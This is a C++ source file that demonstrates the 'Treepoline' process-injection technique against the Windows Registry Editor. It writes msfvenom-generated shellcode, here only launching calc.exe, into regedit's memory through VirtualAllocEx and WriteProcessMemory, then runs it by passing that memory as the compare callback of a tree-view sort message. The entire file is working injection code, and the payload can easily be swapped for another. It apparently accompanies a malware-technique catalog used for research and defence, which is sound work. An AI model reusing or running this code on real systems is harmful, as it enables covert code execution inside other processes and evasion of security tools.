/*
* Title: Treepoline
* Resources:
*	- https://unprotect.it/technique/treepoline/
* Notes:
*	- Registry Editor needs to be opened before executing.
*	- Run this program as Administrator.
*/
#include <Windows.h>
#include <CommCtrl.h>

VOID Cleanup(HANDLE hProcess, LPVOID lpRemoteBuffer, LPVOID lpTvs) {
	if (lpTvs)
		VirtualFreeEx(hProcess, lpTvs, 0, MEM_RELEASE);
	if (lpRemoteBuffer)
		VirtualFreeEx(hProcess, lpRemoteBuffer, 0, MEM_RELEASE);
	if (hProcess)
		CloseHandle(hProcess);
}

BOOL Treepoline() {
	// The shellcode generated by `msfvenom -p windows/x64/exec CMD=calc.exe -f c`
	unsigned char shellcode[] =
		"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
		"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
		"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
		"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
		"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
		"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
		"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
		"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
		"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
		"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
		"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
		"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
		"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
		"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
		"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
		"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
		"\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd"
		"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
		"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
		"\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";

	HWND hWndRegEdit = FindWindow(L"RegEdit_RegEdit", nullptr);
	if (!hWndRegEdit) return FALSE;
	HWND hWndTreeView = FindWindowEx(hWndRegEdit, 0, L"SysTreeView32", 0);
	if (!hWndTreeView) return FALSE;

	DWORD dwPid = 0;
	if (!GetWindowThreadProcessId(hWndTreeView, &dwPid))
		return FALSE;
	
	// Open process and write our shellcode to allocated memory.
	HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
	if (!hProcess) return FALSE;
	LPVOID lpRemoteBuffer = VirtualAllocEx(hProcess, nullptr, sizeof(shellcode), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	if (!lpRemoteBuffer) {
		Cleanup(hProcess, lpRemoteBuffer, nullptr);
		return FALSE;
	}
	SIZE_T dwBytesWritten = 0;
	if (!WriteProcessMemory(hProcess, lpRemoteBuffer, shellcode, sizeof(shellcode), &dwBytesWritten)) {
		Cleanup(hProcess, lpRemoteBuffer, nullptr);
		return FALSE;
	}

	// Obtain the root (first) item handle in tree list.
	HTREEITEM hItem = (HTREEITEM)SendMessage(hWndTreeView, TVM_GETNEXTITEM, TVGN_ROOT, 0);
	if (!hItem) {
		Cleanup(hProcess, lpRemoteBuffer, nullptr);
		return FALSE;
	}

	TVSORTCB tvs = {};
	tvs.hParent = hItem;
	tvs.lpfnCompare = (PFNTVCOMPARE)lpRemoteBuffer; // Our shellcode will be executed during a sort operation.
	tvs.lParam = 0;

	// Allocate memory and write the TVSORTCB structure.
	LPVOID lpTvs = VirtualAllocEx(hProcess, nullptr, sizeof(TVSORTCB), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
	if (!lpTvs) {
		Cleanup(hProcess, lpRemoteBuffer, lpTvs);
		return FALSE;
	}
	if (!WriteProcessMemory(hProcess, lpTvs, &tvs, sizeof(TVSORTCB), &dwBytesWritten)) {
		Cleanup(hProcess, lpRemoteBuffer, lpTvs);
		return FALSE;
	}

	SendMessage(hWndTreeView, TVM_SORTCHILDRENCB, 0, (LPARAM)lpTvs);

	Cleanup(hProcess, lpRemoteBuffer, lpTvs);

	return TRUE;
}
